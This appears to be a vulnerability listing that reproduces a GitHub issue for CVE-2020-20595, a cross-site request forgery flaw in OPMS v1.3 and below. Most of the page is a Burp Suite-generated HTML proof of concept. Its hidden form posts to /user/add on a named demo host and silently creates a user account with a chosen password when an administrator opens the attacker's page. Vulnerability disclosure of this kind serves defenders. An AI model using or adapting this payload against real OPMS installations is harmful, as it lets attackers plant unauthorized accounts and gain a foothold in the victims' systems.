Headline

CVE-2020-20595: There is one CSRF vulnerability that can add the account · Issue #25 · lock-upme/OPMS

A cross-site request forgery (CSRF) in OPMS v1.3 and below allows attackers to arbitrarily add a user account via /user/add.

2 years ago

CVE

Open in Source

#csrf #vulnerability #web #git

Place of backstage set up Organization management exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, add a user

CSRF Exp:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://opms.demo.milu365.cn/user/add" method="POST">
      <input type="hidden" name="username" value="lisi" />
      <input type="hidden" name="password" value="a1234567" />
      <input type="hidden" name="depart" value="1462290164626094232" />
      <input type="hidden" name="position" value="1462292006260420932" />
      <input type="hidden" name="realname" value="lisi" />
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="birth" value="2019&#45;10&#45;14" />
      <input type="hidden" name="email" value="123&#64;qq&#46;com" />
      <input type="hidden" name="webchat" value="" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="phone" value="13800138000" />
      <input type="hidden" name="tel" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="emercontact" value="lxr" />
      <input type="hidden" name="emerphone" value="13800138000" />
      <input type="hidden" name="id" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

We can construct the csrf code, so that after the webmaster clicks on the malicious link of the attacker, it will execute csrf, As long as the administrator visits can add user.